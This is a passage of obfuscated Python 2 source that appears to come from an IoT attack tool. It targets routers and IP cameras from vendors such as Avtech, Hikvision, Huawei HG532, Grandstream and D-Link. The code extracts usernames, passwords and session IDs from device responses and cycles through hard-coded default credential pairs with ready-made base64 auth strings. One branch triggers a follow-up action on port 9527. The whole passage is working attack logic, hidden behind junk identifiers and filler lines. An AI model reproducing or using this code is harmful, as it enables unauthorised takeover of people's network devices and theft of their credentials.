 i11IiiI1I . append ( O0OOo00o00o )
6830
 o0o0000OO [ I11i1I ] = ( targetip , int ( targetport ) , request )
6831
 IIi1i1iiii1Ii [ I11i1I ] = 0
6832
 Ooo000Oo [ I11i1I ] = request
6833
 O0Oooo0ooo0 [ I11i1I ] = ''
6834
 IIiiI [ I11i1I ] = time . time ( )
6835
 O0000o0 [ I11i1I ] = jobhash
6836
 OO0 [ jobhash ] = O0OOo00o00o
6837
 iIi1I1IiIiiIi [ jobhash ] = ''
6838
 return O0OOo00o00o
6839
 if 77 - 77: Ii - IIiII
6840
def oo0O0o0Oo ( webhash ) :
6841
 global i11iiiIi
6842
 if 17 - 17: O0oo0OOOOO00 . IIiIIiIii1I + OOooOO0 % Oo0 * IIiII - Oo0Oo
6843
 if 53 - 53: oOOo0000o / I11I1Ii + IIiIIiIii1I
6844
 if 67 - 67: Ii
6845
 if webhash in o0Oo00O0O0 and o0Oo00O0O0 [ webhash ] == 'hnap' and IIi1i [ webhash ] == '' :
6846
  pass
6847
 else :
6848
  if 64 - 64: i1IIi1i1iiI
6849
  if webhash in o0Oo00O0O0 and o0Oo00O0O0 [ webhash ] != '' and i11iiiIi :
6850
   if IIIiI [ webhash ] :
6851
    if 30 - 30: O0oo0OOOOO00 * oOOoO00oo0 * I11I1Ii + Oo0Oo / Oo0Oo
6852
    if 88 - 88: i1IIi1i1iiI % O0oo - Oo0Oo * Oo0
6853
    iIi1I1IiIiiIi [ webhash ] = IIIiI [ webhash ] + ':' + iIi1I1IiIiiIi [ webhash ]
6854
    if 24 - 24: IIiII
6855
   Ii111i11iIi ( "%s:%d WP:%s:%s/%s:%s" % ( O0oOoo [ webhash ] [ 0 ] , O0oOoo [ webhash ] [ 1 ] , o0Oo00O0O0 [ webhash ] , IiIi11iii [ webhash ] , IIi1i [ webhash ] , iIi1I1IiIiiIi [ webhash ] ) )
6856
   if 78 - 78: I11I1Ii . Oooo . IIiIii1iI
6857
   if 60 - 60: oOoO0Ooo % Oo0 + oOOo0000o / oOOo0000o
6858
 if webhash in o0Oo00O0O0 and o0Oo00O0O0 [ webhash ] == 'xionghash' and IIi1i [ webhash ] != '' :
6859
  IIi1IIii11I1I ( O0oOoo [ webhash ] [ 0 ] , int ( O0oOoo [ webhash ] [ 1 ] ) )
6860
  if 23 - 23: OOooOO0 % i1 % OOOoOooO
6861
  OoO00Ooo0OoOo0O0Oo ( O0oOoo [ webhash ] [ 0 ] , 9527 , 'PORT:9527:' )
6862
  if 93 - 93: Oooo % oOoO0Ooo + Oo0 * O0oo * i1
6863
  if 79 - 79: i1 + I11I1Ii / oOOoO00oo0
6864
 ooOoO0o [ webhash ] = None
6865
 I1I1IIi1i1I [ webhash ] = None
6866
 O0oOoo [ webhash ] = None
6867
 o0O00OO [ webhash ] = None
6868
 OO0 [ webhash ] = None
6869
 o0Oo00O0O0 [ webhash ] = None
6870
 IiIi11iii [ webhash ] = None
6871
 IIi1i [ webhash ] = None
6872
 IIIiI [ webhash ] = None
6873
 IiiI1II1111I1 [ webhash ] = None
6874
 ooOo [ webhash ] = None
6875
 iIiIi1II11 [ webhash ] = None
6876
 Ii1ii [ webhash ] = None
6877
 O0oOO [ webhash ] = None
6878
 O000oo0 . remove ( webhash )
6879
 if 31 - 31: O0oo0OOOOO00 - oOOo0000o * oOOoO00oo0 - OOooOO0 - o0ooO
6880
def oooo0o0 ( f ) :
6881
 i1i1iII1I = bytearray ( )
6882
 O0OooO0Oo0O = 0
6883
 while O0OooO0Oo0O < len ( f ) :
6884
  oOOO00O0 = f [ O0OooO0Oo0O ]
6885
  if oOOO00O0 is None or oOOO00O0 == '\0' :
6886
   return str ( i1i1iII1I )
6887
  else :
6888
   i1i1iII1I . append ( oOOO00O0 )
6889
  O0OooO0Oo0O += 1
6890
  if 72 - 72: oOoO0Ooo
6891
def ii1I1I1i ( boundary , vals ) :
6892
 O0o0oo0000 = ''
6893
 for ooOO00oOo in vals :
6894
  O0o0oo0000 += boundary + '\r\n'
6895
  O0o0oo0000 += 'Content-Disposition: form-data; name="' + ooOO00oOo [ 0 ] + '"\r\n\r\n' + ooOO00oOo [ 1 ] + '\r\n'
6896
 O0o0oo0000 += boundary + '--\r\n'
6897
 return O0o0oo0000
6898
 if 81 - 81: Oo0Oo / Ii
6899
def iIiIii111Ii ( sock ) :
6900
 global webclient_maxattempts
6901
 global iI1iiii11I11I
6902
 global IIIIiI
6903
 if 74 - 74: Oo0Oo . OOOoOooO % o0ooO + IIiII * IIiIIiIii1I . oOOo0000o
6904
 I11i1I = hash ( sock )
6905
 iiIii1I1i1 = O0000o0 [ I11i1I ]
6906
 if 94 - 94: Oo0 + OOOoOooO - IIiIii1iI
6907
 if not O0oOO [ iiIii1I1i1 ] :
6908
  try :
6909
   sock . close ( )
6910
  except :
6911
   pass
6912
 else :
6913
  print "Debug: Skipping sock close due to keepalive"
6914
  pass
6915
  if 98 - 98: O0oo % Ii11i1iIi . Ii11i1iIi * Ii
6916
 OOoOoooOo0 = 0
6917
 if 19 - 19: oOOoO00oo0 % I11I1Ii * OOooOO0
6918
 iIi1I1IiIiiIi [ iiIii1I1i1 ] = '' ;
6919
 try :
6920
  iIi1I1IiIiiIi [ iiIii1I1i1 ] = O0Oooo0ooo0 [ I11i1I ] . split ( '\n' ) [ 0 ] . strip ( )
6921
 except :
6922
  pass
6923
  if 28 - 28: i1
6924
 iii = o0Oo00O0O0 [ iiIii1I1i1 ]
6925
 if 33 - 33: Oo0Oo / IIiIIiIii1I * I11I1Ii - i1IIi1i1iiI + O0oo0OOOOO00
6926
 if iii == 'kguard' :
6927
  if ooOoO0o [ iiIii1I1i1 ] == 0 :
6928
   if not 'MCTP/1.0 2' in O0Oooo0ooo0 [ I11i1I ] :
6929
    ooOoO0o [ iiIii1I1i1 ] = 99
6930
   else :
6931
    IiIi11iii [ iiIii1I1i1 ] = 'xesp'
6932
  ooOoO0o [ iiIii1I1i1 ] += 1
6933
  if 25 - 25: IIiIIiIii1I % IIiIii1iI / OOooOO0
6934
 if iii == 'hnap' :
6935
  if ooOoO0o [ iiIii1I1i1 ] == 0 :
6936
   if not 'purenetworks' in O0Oooo0ooo0 [ I11i1I ] :
6937
    ooOoO0o [ iiIii1I1i1 ] = 99
6938
   else :
6939
    IiIi11iii [ iiIii1I1i1 ] = 'n'
6940
    IIi1i [ iiIii1I1i1 ] = 'a'
6941
  ooOoO0o [ iiIii1I1i1 ] += 1
6942
  if 11 - 11: oOOoO00oo0 % OOOoOooO + OOOoOooO % OOooOO0
6943
 if iii == 'avtech' :
6944
  if 44 - 44: i1 + oOOoO00oo0 - oOOoO00oo0 * OOOoOooO * Ii11i1iIi
6945
  if ooOoO0o [ iiIii1I1i1 ] == 0 :
6946
   if 84 - 84: O0oo0OOOOO00 * IIiIii1iI % i1IIi1i1iiI
6947
   if 6 - 6: oOOoO00oo0 . OOooOO0 - i1 - Oo0
6948
   if 31 - 31: Oo0 % Oo0 / Ii
6949
   if 22 - 22: OOooOO0 . Oooo
6950
   if 87 - 87: OOOoOooO
6951
   oOo0O0O = ''
6952
   IIIIiiIIIiiII = ''
6953
   for O00O0oOoo in O0Oooo0ooo0 [ I11i1I ] . split ( ) :
6954
    i1IiiIIIi = O00O0oOoo . split ( '=' )
6955
    if ( len ( i1IiiIIIi ) == 2 ) :
6956
     if ( i1IiiIIIi [ 0 ] == 'Account.User1.Username' ) :
6957
      oOo0O0O = i1IiiIIIi [ 1 ]
6958
     elif ( i1IiiIIIi [ 0 ] == 'Account.User1.Password' ) :
6959
      IIIIiiIIIiiII = i1IiiIIIi [ 1 ]
6960
      break
6961
     if ( i1IiiIIIi [ 0 ] == 'Account.User2.Username' ) :
6962
      oOo0O0O = i1IiiIIIi [ 1 ]
6963
     elif ( i1IiiIIIi [ 0 ] == 'Account.User2.Password' ) :
6964
      IIIIiiIIIiiII = i1IiiIIIi [ 1 ]
6965
      break
6966
     if ( i1IiiIIIi [ 0 ] == 'Account.User3.Username' ) :
6967
      oOo0O0O = i1IiiIIIi [ 1 ]
6968
     elif ( i1IiiIIIi [ 0 ] == 'Account.User3.Password' ) :
6969
      IIIIiiIIIiiII = i1IiiIIIi [ 1 ]
6970
      break
6971
      if 77 - 77: Ii11i1iIi . oOOo0000o % IIiIIiIii1I . oOOo0000o * i1
6972
      if 86 - 86: oOOo0000o % I11I1Ii . oOOo0000o . O0oo
6973
   if IIIIiiIIIiiII == '' :
6974
    oOo0O0O = 'admin'
6975
    IIIIiiIIIiiII = 'admin'
6976
   IiIi11iii [ iiIii1I1i1 ] = oOo0O0O
6977
   IIi1i [ iiIii1I1i1 ] = IIIIiiIIIiiII
6978
   IiiI1II1111I1 [ iiIii1I1i1 ] = binascii . b2a_base64 ( '%s:%s' % ( oOo0O0O , IIIIiiIIIiiII ) ) . strip ( )
6979
  ooOoO0o [ iiIii1I1i1 ] += 1
6980
 if iii == 'wificam' :
6981
  if 49 - 49: Oooo + i1IIi1i1iiI % IIiII
6982
  if ooOoO0o [ iiIii1I1i1 ] == 0 :
6983
   if 49 - 49: Oo0 + oOOoO00oo0 . OOooOO0 - Oo0Oo . o0oooooO
6984
   try :
6985
    O000OOo0oOOOo = O0Oooo0ooo0 [ I11i1I ] . find ( '\x0a\x0a\x0a\x0a\x01' )
6986
    oOo0O0O = ''
6987
    IIIIiiIIIiiII = ''
6988
    if O000OOo0oOOOo >= 0 :
6989
     O000OOo0oOOOo += ( 138 + 4 )
6990
     if 58 - 58: O0oo + OOOoOooO . o0oooooO * IIiIii1iI * O0oo0OOOOO00 * Ii
6991
     oOo0O0O = oooo0o0 ( O0Oooo0ooo0 [ I11i1I ] [ O000OOo0oOOOo : O000OOo0oOOOo + 31 ] )
6992
     IIIIiiIIIiiII = oooo0o0 ( O0Oooo0ooo0 [ I11i1I ] [ O000OOo0oOOOo + 32 : O000OOo0oOOOo + 63 ] )
6993
     if 85 - 85: IIiII + O0oo * OOOoOooO
6994
     ooOoO0o [ iiIii1I1i1 ] += 1
6995
    IiIi11iii [ iiIii1I1i1 ] = oOo0O0O
6996
    IIi1i [ iiIii1I1i1 ] = IIIIiiIIIiiII
6997
   except :
6998
    pass
6999
   ooOoO0o [ iiIii1I1i1 ] += 1
7000
  elif ooOoO0o [ iiIii1I1i1 ] == 1 :
7001
   if 93 - 93: Ii - IIiIii1iI * IIiII % i1IIi1i1iiI * OOOoOooO - I11I1Ii
7002
   oOo0O0O = ''
7003
   IIIIiiIIIiiII = ''
7004
   Oo00oO0O = re . search ( 'loginuser="([^"]+)";' , O0Oooo0ooo0 [ I11i1I ] ) ;
7005
   if Oo00oO0O :
7006
    oOo0O0O = Oo00oO0O . group ( 1 )
7007
   Oo00oO0O = re . search ( 'loginpass="([^"]+)";' , O0Oooo0ooo0 [ I11i1I ] ) ;
7008
   if Oo00oO0O :
7009
    IIIIiiIIIiiII = Oo00oO0O . group ( 1 )
7010
    if 30 - 30: o0oooooO / IIiIIiIii1I + o0oooooO + IIiII + i1 + oOoO0Ooo
7011
    if 28 - 28: oOOo0000o + O0oo0OOOOO00 - oOOoO00oo0
7012
   if IIIIiiIIIiiII == '' and oOo0O0O == '' and IiIi11iii [ iiIii1I1i1 ] == '' :
7013
    if 46 - 46: o0oooooO
7014
    oOo0O0O = "admin"
7015
    IIIIiiIIIiiII = "admin"
7016
    if 75 - 75: o0ooO + IIiII + oOoO0Ooo + IIiIii1iI
7017
   if IiIi11iii [ iiIii1I1i1 ] == '' :
7018
    IiIi11iii [ iiIii1I1i1 ] = oOo0O0O
7019
   if IIi1i [ iiIii1I1i1 ] == '' :
7020
    IIi1i [ iiIii1I1i1 ] = IIIIiiIIIiiII
7021
   ooOoO0o [ iiIii1I1i1 ] += 1
7022
  elif ooOoO0o [ iiIii1I1i1 ] >= 2 :
7023
   ooOoO0o [ iiIii1I1i1 ] += 1
7024
   if 22 - 22: Oooo - OOooOO0 + O0oo0OOOOO00 + OOOoOooO % Oooo . Ii
7025
 if iii == 'homestation' :
7026
  if ooOoO0o [ iiIii1I1i1 ] <= 0 :
7027
   if 70 - 70: Ii11i1iIi * O0oo
7028
   IIIoOo = re . search ( 'sessionid\'\s*:\'(\S+)\'' , O0Oooo0ooo0 [ I11i1I ] )
7029
   if IIIoOo :
7030
    IiiI1II1111I1 [ iiIii1I1i1 ] = IIIoOo . group ( 1 )
7031
    IiIi11iii [ iiIii1I1i1 ] = 'TelefonicaUser'
7032
    IIi1i [ iiIii1I1i1 ] = 'user'
7033
   else :
7034
    if ooOoO0o [ iiIii1I1i1 ] >= 0 :
7035
     ooOoO0o [ iiIii1I1i1 ] = 99
7036
  ooOoO0o [ iiIii1I1i1 ] += 1
7037
  if 84 - 84: IIiIii1iI
7038
 if iii == 'observa' :
7039
  if ooOoO0o [ iiIii1I1i1 ] <= 0 :
7040
   if 55 - 55: I11I1Ii
7041
   IIIoOo = re . search ( 'sessionid\'\s*:\'(\S+)\'' , O0Oooo0ooo0 [ I11i1I ] )
7042
   I1I11 = re . search ( 'username\'\s*:\'(\S+)\'' , O0Oooo0ooo0 [ I11i1I ] )
7043
   i1iii1I1 = re . search ( 'password\'\s*:\'(\S+)\'' , O0Oooo0ooo0 [ I11i1I ] )
7044
   if IIIoOo and I1I11 and i1iii1I1 :
7045
    IiiI1II1111I1 [ iiIii1I1i1 ] = IIIoOo . group ( 1 )
7046
    ooOo [ iiIii1I1i1 ] = '' . join ( random . choice ( '0123456789' ) for i in range ( 8 ) )
7047
    iIiIi1II11 [ iiIii1I1i1 ] = ''
7048
    IiIi11iii [ iiIii1I1i1 ] = I1I11 . group ( 1 )
7049
    IIi1i [ iiIii1I1i1 ] = i1iii1I1 . group ( 1 )
7050
   else :
7051
    if ooOoO0o [ iiIii1I1i1 ] >= 0 :
7052
     ooOoO0o [ iiIii1I1i1 ] = 99
7053
  else :
7054
   Oo00oO0O = re . search ( 'G_Conns\S+\s+=\s+\"(\S+)\"\;\s+\S*Username' , O0Oooo0ooo0 [ I11i1I ] )
7055
   if Oo00oO0O :
7056
    Ii1ii [ iiIii1I1i1 ] = Oo00oO0O . group ( 1 )
7057
    Oo00oO0O = re . search ( '\d+@(\S+)' , Ii1ii [ iiIii1I1i1 ] )
7058
    if Oo00oO0O :
7059
     iIiIi1II11 [ iiIii1I1i1 ] = ooOo [ iiIii1I1i1 ] + '%40' + Oo00oO0O . group ( 1 )
7060
    else :
7061
     iIiIi1II11 [ iiIii1I1i1 ] = Ii1ii [ iiIii1I1i1 ]
7062
  ooOoO0o [ iiIii1I1i1 ] += 1
7063
  if 19 - 19: i1 % i1 % Oooo
7064
 if iii == 'hg532' :
7065
  if ooOoO0o [ iiIii1I1i1 ] <= 3 :
7066
   if 'SessionID_R3=' in O0Oooo0ooo0 [ I11i1I ] :
7067
    if ooOoO0o [ iiIii1I1i1 ] == 0 :
7068
     IiIi11iii [ iiIii1I1i1 ] = 'admin'
7069
     IIi1i [ iiIii1I1i1 ] = 'admin'
7070
     ooOo [ iiIii1I1i1 ] = 'OGM2OTc2ZTViNTQxMDQxNWJkZTkwOGJkNGRlZTE1ZGZiMTY3YTljODczZmM0YmI4YTgxZjZmMmFiNDQ4YTkxOA%3D%3D'
7071
     iIiIi1II11 [ iiIii1I1i1 ] = ''
7072
     ooOoO0o [ iiIii1I1i1 ] = 3
7073
    elif ooOoO0o [ iiIii1I1i1 ] == 1 :
7074
     IiIi11iii [ iiIii1I1i1 ] = 'instalador'
7075
     IIi1i [ iiIii1I1i1 ] = '.corporacion'
7076
     ooOo [ iiIii1I1i1 ] = 'N2MwNGQxMzUzNzI1Y2ZkNzU4ZTFhYzNjM2JjZGRiMDkxNWNlNzA4OWU1NTlkODQ0Yjk2YTU4MjFmNTM1N2Y4Mg%3D%3D'
7077
     iIiIi1II11 [ iiIii1I1i1 ] = 'CNT_ES_'
7078
     ooOoO0o [ iiIii1I1i1 ] = 3
7079
    elif ooOoO0o [ iiIii1I1i1 ] == 2 :
7080
     IiIi11iii [ iiIii1I1i1 ] = 'instalador'
7081
     IIi1i [ iiIii1I1i1 ] = 'cnt2016admin'
7082
     ooOo [ iiIii1I1i1 ] = 'NjQzMGU0ZDBhMTMyYzI5Njg4NGUzMjNlOWJkMWM1MzJhODZmYmQ3OWJlYmUxN2U0Nzc1NDlmZjBkYjM0YzNiNA%3D%3D'
7083
     iIiIi1II11 [ iiIii1I1i1 ] = 'CNT_ES_'
7084
     ooOoO0o [ iiIii1I1i1 ] = 3
7085
    elif ooOoO0o [ iiIii1I1i1 ] == 3 :
7086
     IiIi11iii [ iiIii1I1i1 ] = 'admin'
7087
     IIi1i [ iiIii1I1i1 ] = 'admin'
7088
     ooOo [ iiIii1I1i1 ] = 'YWRtaW4%3D'
7089
     iIiIi1II11 [ iiIii1I1i1 ] = ''
7090
     ooOoO0o [ iiIii1I1i1 ] = 3
7091
   else :
7092
    if ooOoO0o [ iiIii1I1i1 ] == 2 :
7093
     if 96 - 96: Oo0 / oOOoO00oo0 / Oooo
7094
     o0O00OO [ iiIii1I1i1 ] = time . time ( ) + 65 ;
7095
    if ooOoO0o [ iiIii1I1i1 ] >= 3 :
7096
     ooOoO0o [ iiIii1I1i1 ] = 99
7097
     if 79 - 79: Oooo + IIiIIiIii1I % i1
7098
  Oo00oO0O = re . search ( 'SessionID_R3=([a-zA-Z0-9]+)' , O0Oooo0ooo0 [ I11i1I ] )
7099
  if Oo00oO0O :
7100
   IiiI1II1111I1 [ iiIii1I1i1 ] = Oo00oO0O . group ( 1 )
7101
  ooOoO0o [ iiIii1I1i1 ] += 1
7102
  if 63 - 63: i1 % I11I1Ii / O0oo0OOOOO00 - IIiIIiIii1I / IIiIIiIii1I + IIiIIiIii1I
7103
 if iii == 'hg532a' :
7104
  if ooOoO0o [ iiIii1I1i1 ] <= 0 :
7105
   if 'sessionID=' in O0Oooo0ooo0 [ I11i1I ] :
7106
    if ooOoO0o [ iiIii1I1i1 ] == 0 :
7107
     IiIi11iii [ iiIii1I1i1 ] = 'admin'
7108
     IIi1i [ iiIii1I1i1 ] = 'admin'
7109
     ooOo [ iiIii1I1i1 ] = 'YWRtaW4='
7110
     iIiIi1II11 [ iiIii1I1i1 ] = ''
7111
     ooOoO0o [ iiIii1I1i1 ] = 0
7112
   else :
7113
    ooOoO0o [ iiIii1I1i1 ] = 99
7114
    if 95 - 95: OOOoOooO - I11I1Ii * O0oo % Oo0Oo - OOooOO0 * Oooo
7115
  Oo00oO0O = re . search ( 'sessionID=([a-zA-Z0-9]+)' , O0Oooo0ooo0 [ I11i1I ] )
7116
  if Oo00oO0O :
7117
   IiiI1II1111I1 [ iiIii1I1i1 ] = Oo00oO0O . group ( 1 )
7118
  ooOoO0o [ iiIii1I1i1 ] += 1
7119
  if 96 - 96: IIiIii1iI + I11I1Ii % I11I1Ii * i1
7120
 if iii == 'zxdsl831' :
7121
  if ooOoO0o [ iiIii1I1i1 ] <= 1 :
7122
   if 'vpivci.cgi' in O0Oooo0ooo0 [ I11i1I ] :
7123
    IiIi11iii [ iiIii1I1i1 ] = 'n'
7124
    IIi1i [ iiIii1I1i1 ] = 'a'
7125
    ooOoO0o [ iiIii1I1i1 ] = 1
7126
   else :
7127
    if ooOoO0o [ iiIii1I1i1 ] >= 1 :
7128
     ooOoO0o [ iiIii1I1i1 ] = 99
7129
  ooOoO0o [ iiIii1I1i1 ] += 1
7130
  if 41 - 41: OOOoOooO
7131
 if iii == 'engenius' :
7132
  IiIi11iii [ iiIii1I1i1 ] = 'n'
7133
  IIi1i [ iiIii1I1i1 ] = 'a'
7134
  ooOoO0o [ iiIii1I1i1 ] += 1
7135
  if 20 - 20: O0oo0OOOOO00 / Oooo * o0ooO / Ii11i1iIi + o0ooO
7136
 if iii == 'crossweb' :
7137
  if 69 - 69: Oooo . Oooo / IIiII + O0oo0OOOOO00 % Oo0Oo - OOooOO0
7138
  IiIi11iii [ iiIii1I1i1 ] = 'n'
7139
  IIi1i [ iiIii1I1i1 ] = 'a'
7140
  ooOoO0o [ iiIii1I1i1 ] += 1
7141
  if 26 - 26: IIiIii1iI . I11I1Ii - i1 . Oooo
7142
 if iii == 'hanbang' :
7143
  if ooOoO0o [ iiIii1I1i1 ] > 0 and ooOoO0o [ iiIii1I1i1 ] <= 5 :
7144
   if 25 - 25: Oo0
7145
   if 'Value>200</status' in O0Oooo0ooo0 [ I11i1I ] :
7146
    if ooOoO0o [ iiIii1I1i1 ] == 1 :
7147
     IiIi11iii [ iiIii1I1i1 ] = 'admin'
7148
     IIi1i [ iiIii1I1i1 ] = '888888'
7149
     IiiI1II1111I1 [ iiIii1I1i1 ] = 'YWRtaW46ODg4ODg4'
7150
     ooOoO0o [ iiIii1I1i1 ] = 5
7151
    elif ooOoO0o [ iiIii1I1i1 ] == 2 :
7152
     IiIi11iii [ iiIii1I1i1 ] = 'admin'
7153
     IIi1i [ iiIii1I1i1 ] = 'admin'
7154
     IiiI1II1111I1 [ iiIii1I1i1 ] = 'YWRtaW46YWRtaW4='
7155
     ooOoO0o [ iiIii1I1i1 ] = 5
7156
    elif ooOoO0o [ iiIii1I1i1 ] == 3 :
7157
     IiIi11iii [ iiIii1I1i1 ] = 'admin'
7158
     IIi1i [ iiIii1I1i1 ] = '123456'
7159
     IiiI1II1111I1 [ iiIii1I1i1 ] = 'YWRtaW46MTIzNDU2'
7160
     ooOoO0o [ iiIii1I1i1 ] = 5
7161
    elif ooOoO0o [ iiIii1I1i1 ] == 4 :
7162
     IiIi11iii [ iiIii1I1i1 ] = 'admin'
7163
     IIi1i [ iiIii1I1i1 ] = '000000'
7164
     IiiI1II1111I1 [ iiIii1I1i1 ] = 'YWRtaW46MDAwMDAw'
7165
     ooOoO0o [ iiIii1I1i1 ] = 5
7166
    elif ooOoO0o [ iiIii1I1i1 ] == 5 :
7167
     IiIi11iii [ iiIii1I1i1 ] = 'admin'
7168
     IIi1i [ iiIii1I1i1 ] = '12345678'
7169
     IiiI1II1111I1 [ iiIii1I1i1 ] = 'YWRtaW46MTIzNDU2Nzg='
7170
     ooOoO0o [ iiIii1I1i1 ] = 5
7171
   else :
7172
    if ooOoO0o [ iiIii1I1i1 ] >= 5 :
7173
     ooOoO0o [ iiIii1I1i1 ] = 99
7174
  ooOoO0o [ iiIii1I1i1 ] += 1
7175
  if 50 - 50: Oo0Oo / oOoO0Ooo - oOOoO00oo0 + IIiIIiIii1I
7176
 if iii == 'grandstream' :
7177
  if ooOoO0o [ iiIii1I1i1 ] <= 4 :
7178
   if 82 - 82: OOOoOooO * O0oo
7179
   if '200 OK' in O0Oooo0ooo0 [ I11i1I ] :
7180
    if ooOoO0o [ iiIii1I1i1 ] == 0 :
7181
     IiIi11iii [ iiIii1I1i1 ] = 'admin'
7182
     IIi1i [ iiIii1I1i1 ] = 'admin'
7183
     IiiI1II1111I1 [ iiIii1I1i1 ] = 'YWRtaW46YWRtaW4='
7184
     ooOoO0o [ iiIii1I1i1 ] = 4
7185
    elif ooOoO0o [ iiIii1I1i1 ] == 1 :
7186
     IiIi11iii [ iiIii1I1i1 ] = 'admin'
7187
     IIi1i [ iiIii1I1i1 ] = '12345'
7188
     IiiI1II1111I1 [ iiIii1I1i1 ] = 'YWRtaW46MTIzNDU='
7189
     ooOoO0o [ iiIii1I1i1 ] = 4
7190
    elif ooOoO0o [ iiIii1I1i1 ] == 2 :
7191
     IiIi11iii [ iiIii1I1i1 ] = 'admin'
7192
     IIi1i [ iiIii1I1i1 ] = '1234'
7193
     IiiI1II1111I1 [ iiIii1I1i1 ] = 'YWRtaW46MTIzNA=='
7194
     ooOoO0o [ iiIii1I1i1 ] = 4
7195
    elif ooOoO0o [ iiIii1I1i1 ] == 3 :
7196
     IiIi11iii [ iiIii1I1i1 ] = 'admin'
7197
     IIi1i [ iiIii1I1i1 ] = '123456'
7198
     IiiI1II1111I1 [ iiIii1I1i1 ] = 'YWRtaW46MTIzNDU2'
7199
     ooOoO0o [ iiIii1I1i1 ] = 4
7200
    elif ooOoO0o [ iiIii1I1i1 ] == 4 :
7201
     IiIi11iii [ iiIii1I1i1 ] = 'admin'
7202
     IIi1i [ iiIii1I1i1 ] = '888888'
7203
     IiiI1II1111I1 [ iiIii1I1i1 ] = 'YWRtaW46ODg4ODg4'
7204
     ooOoO0o [ iiIii1I1i1 ] = 4
7205
   else :
7206
    if ooOoO0o [ iiIii1I1i1 ] >= 4 :
7207
     ooOoO0o [ iiIii1I1i1 ] = 99
7208
  ooOoO0o [ iiIii1I1i1 ] += 1
7209
  if 14 - 14: IIiIii1iI + Oooo
7210
 if iii == 'dir300600' :
7211
  IiIi11iii [ iiIii1I1i1 ] = 'n'
7212
  IIi1i [ iiIii1I1i1 ] = 'a'
7213
  ooOoO0o [ iiIii1I1i1 ] += 1
7214
  if 67 - 67: IIiII
7215
 if iii == 'dir850' :
7216
  if ooOoO0o [ iiIii1I1i1 ] == 0 :
7217
   if '<gw_name>' in O0Oooo0ooo0 [ I11i1I ] :
7218
    IIIoOo = re . search ( 'name>([^<]+)</name' , O0Oooo0ooo0 [ I11i1I ] )
7219
    I1I11 = re . search ( 'password>(.*)</password>' , O0Oooo0ooo0 [ I11i1I ] )
7220
    if IIIoOo and I1I11 :
7221
     IiIi11iii [ iiIii1I1i1 ] = IIIoOo . group ( 1 )
7222
     IIi1i [ iiIii1I1i1 ] = I1I11 . group ( 1 )
7223
  if ooOoO0o [ iiIii1I1i1 ] == 1 :
7224
   if 54 - 54: IIiIIiIii1I + O0oo0OOOOO00 * Oooo - O0oo0OOOOO00 . O0oo
7225
   if 'status": "ok"' in O0Oooo0ooo0 [ I11i1I ] :
7226
    IiIi11iii [ iiIii1I1i1 ] += 'OK'
7227
  ooOoO0o [ iiIii1I1i1 ] += 1
7228
  if 59 - 59: IIiIIiIii1I
7229
 if iii == 'hikweb' :
7230
  if ooOoO0o [ iiIii1I1i1 ] <= 10 :
7231
   if 33 - 33: OOooOO0 + i1
7232
   if 'Reboot Required' in O0Oooo0ooo0 [ I11i1I ] :
7233
    IiIi11iii [ iiIii1I1i1 ] = 'n'
7234
    IIi1i [ iiIii1I1i1 ] = 'a'
7235
    if 99 - 99: i1IIi1i1iiI . IIiIii1iI + o0ooO
7236
   elif 'Value>200</status' in O0Oooo0ooo0 [ I11i1I ] :
7237
    if ooOoO0o [ iiIii1I1i1 ] == 0 :
7238
     IiIi11iii [ iiIii1I1i1 ] = 'admin'
7239
     IIi1i [ iiIii1I1i1 ] = '12345'
7240
     IiiI1II1111I1 [ iiIii1I1i1 ] = 'YWRtaW46MTIzNDU='
7241
     ooOoO0o [ iiIii1I1i1 ] = 10
7242
    elif ooOoO0o [ iiIii1I1i1 ] == 1 :
7243
     IiIi11iii [ iiIii1I1i1 ] = 'admin'
7244
     IIi1i [ iiIii1I1i1 ] = 'admin'
7245
     IiiI1II1111I1 [ iiIii1I1i1 ] = 'YWRtaW46YWRtaW4='
7246
     ooOoO0o [ iiIii1I1i1 ] = 10
7247
    elif ooOoO0o [ iiIii1I1i1 ] == 2 :
7248
     IiIi11iii [ iiIii1I1i1 ] = 'admin'
7249
     IIi1i [ iiIii1I1i1 ] = '1234'
7250
     IiiI1II1111I1 [ iiIii1I1i1 ] = 'YWRtaW46MTIzNA=='
7251
     ooOoO0o [ iiIii1I1i1 ] = 10
7252
    elif ooOoO0o [ iiIii1I1i1 ] == 3 :
7253
     IiIi11iii [ iiIii1I1i1 ] = 'admin'
7254
     IIi1i [ iiIii1I1i1 ] = '888888'
7255
     IiiI1II1111I1 [ iiIii1I1i1 ] = 'YWRtaW46ODg4ODg4'
7256
     ooOoO0o [ iiIii1I1i1 ] = 10
7257
    elif ooOoO0o [ iiIii1I1i1 ] == 4 :
7258
     IiIi11iii [ iiIii1I1i1 ] = 'admin'
7259
     IIi1i [ iiIii1I1i1 ] = '54321'
7260
     IiiI1II1111I1 [ iiIii1I1i1 ] = 'YWRtaW46NTQzMjE='
7261
     ooOoO0o [ iiIii1I1i1 ] = 10
7262
    elif ooOoO0o [ iiIii1I1i1 ] == 5 :
7263
     IiIi11iii [ iiIii1I1i1 ] = 'admin'
7264
     IIi1i [ iiIii1I1i1 ] = '123456'
7265
     IiiI1II1111I1 [ iiIii1I1i1 ] = 'YWRtaW46MTIzNDU2'
7266
     ooOoO0o [ iiIii1I1i1 ] = 10
7267
    elif ooOoO0o [ iiIii1I1i1 ] == 6 :
7268
     IiIi11iii [ iiIii1I1i1 ] = 'admin'
7269
     IIi1i [ iiIii1I1i1 ] = '111111'
7270
     IiiI1II1111I1 [ iiIii1I1i1 ] = 'YWRtaW46MTExMTEx'
7271
     ooOoO0o [ iiIii1I1i1 ] = 10
7272
    elif ooOoO0o [ iiIii1I1i1 ] == 7 :
7273
     IiIi11iii [ iiIii1I1i1 ] = 'admin'
7274
     IIi1i [ iiIii1I1i1 ] = '654321'
7275
     IiiI1II1111I1 [ iiIii1I1i1 ] = 'YWRtaW46NjU0MzIx'
7276
     ooOoO0o [ iiIii1I1i1 ] = 10
7277
    elif ooOoO0o [ iiIii1I1i1 ] == 8 :
7278
     IiIi11iii [ iiIii1I1i1 ] = 'admin'
7279
     IIi1i [ iiIii1I1i1 ] = '123456789abc'
7280
     IiiI1II1111I1 [ iiIii1I1i1 ] = 'YWRtaW46MTIzNDU2Nzg5YWJj'
7281
     ooOoO0o [ iiIii1I1i1 ] = 10
7282
    elif ooOoO0o [ iiIii1I1i1 ] == 9 :
7283
     if 39 - 39: I11I1Ii
7284
     pass
7285
    elif ooOoO0o [ iiIii1I1i1 ] == 10 :
7286
     if 40 - 40: oOOo0000o * i1 * IIiII
7287
     pass
7288
   else :
7289
    if ooOoO0o [ iiIii1I1i1 ] >= 10 :
7290
